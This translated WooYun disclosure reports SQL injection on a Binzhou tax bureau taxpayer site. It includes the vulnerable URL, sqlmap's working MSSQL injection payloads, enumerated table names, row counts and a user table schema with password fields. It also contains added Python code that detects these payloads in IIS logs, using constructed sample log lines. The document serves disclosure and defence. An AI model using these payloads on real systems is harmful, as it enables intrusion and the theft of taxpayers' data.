
Vulnerability Summary

Defect ID: wooyun-2015-0111137

Title: SQL injection in a sub-site of a municipal State Taxation Bureau in Shandong [Part 2]

Related vendor: Binzhou State Taxation Bureau (滨州市国税局)

Author: Yang

Submitted: 2015-04-29 20:25

Fixed: 2015-06-18 10:06

Published: 2015-06-18 10:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-04-29: Details sent to the vendor, awaiting vendor handling
2015-05-04: Vendor confirmed; details visible to the vendor only
2015-05-14: Details disclosed to core white hats and experts in the relevant field
2015-05-24: Details disclosed to regular white hats
2015-06-03: Details disclosed to intern white hats
2015-06-18: Details disclosed to the public

Brief description:

Present on the so-called "Taxpayers' Home" (纳税人之家) site,
and also on the Taxpayer Online School (纳税人网校).

Detailed description:

http://ws.bzsqgs.com/YC_xwList.aspx?fl=1 (GET)
The fl parameter is vulnerable to SQL injection.

sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Parameter: fl (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: fl=1' AND 4372=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4372=4372) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113))) AND 'bCqq'='bCqq
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: fl=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: fl=1' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] YC_GuoShuiJu


Enumerated one database:

back-end DBMS: Microsoft SQL Server 2005
Database: YC_GuoShuiJu
[42 tables]
+----------------------+
| WX_Tixing |
| WX_hangye |
| WX_info |
| WX_kaoshi |
| WX_kecheng |
| WX_ksResult |
| WX_lanmu |
| WX_lwkc |
| WX_pxkc |
| WX_sheying |
| WX_shoucang |
| WX_shouke |
| WX_shouke_r_xuesheng |
| WX_tiku |
| WX_tongzhi |
| WX_xianqu |
| WX_xuanxiang |
| WX_xuesheng |
| WX_yijian |
| YC_bmzhanghao |
| YC_bumen |
| YC_daan |
| YC_huifu |
| YC_lanmu |
| YC_liuyan |
| YC_lyfenlei |
| YC_mingan |
| YC_quanxian |
| YC_users |
| YC_xiazai |
| YC_xinxi |
| YC_xqfenlei |
| YC_xuqiu |
| YC_xzfenlei |
| YC_yonghu |
| YC_zbsj |
| YC_zhiban |
| YC_zhuanjia |
| YC_zjliuyan |
| htlm |
| jubao |
| jubaohuifu |
+----------------------+
Database: YC_GuoShuiJu
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| dbo.YC_daan | 346 |
| dbo.YC_xinxi | 248 |
| dbo.WX_shouke_r_xuesheng | 148 |
| dbo.WX_xuesheng | 129 |
| dbo.YC_zhiban | 123 |
| dbo.YC_huifu | 82 |
| dbo.YC_liuyan | 66 |
| dbo.WX_info | 43 |
| dbo.htlm | 36 |
| dbo.YC_xqfenlei | 29 |
| dbo.YC_zhuanjia | 28 |
| dbo.WX_xuanxiang | 16 |
| dbo.WX_hangye | 14 |
| dbo.WX_lanmu | 12 |
| dbo.WX_Tixing | 11 |
| dbo.WX_xianqu | 10 |
| dbo.WX_tiku | 9 |
| dbo.jubao | 7 |
| dbo.WX_kecheng | 7 |
| dbo.YC_lanmu | 7 |
| dbo.YC_lyfenlei | 7 |
| dbo.YC_quanxian | 7 |
| dbo.WX_shoucang | 5 |
| dbo.WX_shouke | 5 |
| dbo.YC_xuqiu | 4 |
| dbo.YC_bumen | 3 |
| dbo.YC_mingan | 3 |
| dbo.YC_yonghu | 3 |
| dbo.jubaohuifu | 2 |
| dbo.YC_xiazai | 2 |
| dbo.YC_zbsj | 2 |
| dbo.YC_users | 1 |
| dbo.YC_xzfenlei | 1 |
+--------------------------+---------+
Database: YC_GuoShuiJu
Table: WX_xuesheng
[22 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| gsdz | varchar |
| gsmc | varchar |
| guhua | varchar |
| hyId | int |
| id | int |
| jifen | int |
| lastTime | datetime |
| lastTime1 | datetime |
| LastTime2 | datetime |
| mail | varchar |
| pwd | varchar |
| sjh | varchar |
| spKcIds | varchar |
| sshy | varchar |
| uName | varchar |
| xb | int |
| xqId | varchar |
| xqmc | varchar |
| xuehao | varchar |
| yzsjh | varchar |
| zcsj | varchar |
| zsxm | varchar |
+-----------+----------+
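As an added defender-side example (not part of the original report), the following Python scans IIS W3C log lines for the two MSSQL payload families sqlmap reported above (error-based via CONVERT(INT, ...) and time-based/stacked via WAITFOR DELAY) and additionally flags any non-numeric value of the fl parameter, which the application only ever expects as an integer. The log lines and the IIS field order are constructed for the example.

```python
"""Added example, not from the original report: detect the injection families shown
above in IIS W3C logs. The sample lines and field order below are constructed."""
import re
from urllib.parse import unquote_plus

# Payload families visible in the sqlmap output, matched after URL decoding.
SIGNATURES = {
    "mssql-error-based": re.compile(r"CONVERT\s*\(\s*INT\s*,", re.I),
    "mssql-time-based": re.compile(r"WAITFOR\s+DELAY", re.I),
}
# Parameters the application should only ever receive as integers (fl=1 in the report).
NUMERIC_PARAMS = {"fl"}

# Constructed sample log: benign request, error-based probe, stacked WAITFOR probe, benign request.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2015-04-29 12:00:01 10.0.0.5 GET /YC_xwList.aspx fl=1 80 - 203.0.113.7 Mozilla/5.0 200
2015-04-29 12:00:02 10.0.0.5 GET /YC_xwList.aspx fl=1%27+AND+4372%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%2BCHAR%28107%29%29%29+AND+%27bCqq%27%3D%27bCqq 80 - 203.0.113.7 Mozilla/5.0 500
2015-04-29 12:00:03 10.0.0.5 GET /YC_xwList.aspx fl=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.7 Mozilla/5.0 200
2015-04-29 12:00:04 10.0.0.5 GET /YC_xwList.aspx fl=2 80 - 198.51.100.9 Mozilla/5.0 200
"""

def decode_query(raw_query):
    """Split a logged cs-uri-query into (name, value) pairs, URL-decoding each part."""
    pairs = []
    for pair in raw_query.split("&"):
        if pair and pair != "-":          # IIS logs "-" when there is no query string
            name, _, value = pair.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def classify_value(name, value):
    """Return the list of detection names that fire for one parameter value."""
    hits = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
    if name in NUMERIC_PARAMS and not value.isdigit():
        hits.append("non-numeric-value")
    return hits

def scan_iis_log(text):
    """Return one finding dict per (line, parameter) that triggers any detection."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split(" ")
        if line.startswith("#") or len(fields) < 9:   # skip directives and short lines
            continue
        for name, value in decode_query(fields[5]):     # fields[5] is cs-uri-query
            hits = classify_value(name, value)
            if hits:
                findings.append({"line": lineno, "client": fields[8], "param": name, "hits": hits})
    return findings
```

The non-numeric check is the higher-signal rule here: it catches any quote-breaking attempt on fl regardless of which DBMS technique follows, while the signature rules name the family for triage.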


Proof of vulnerability:

The tables contain data.

These records are all companies attending training at the tax bureau.

Remediation:

Copyright notice: please credit Yang@WooYun when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-05-04 10:05

Vendor reply:

CNVD confirmed and reproduced the described vulnerability; it has been forwarded by CNCERT to the Shandong branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet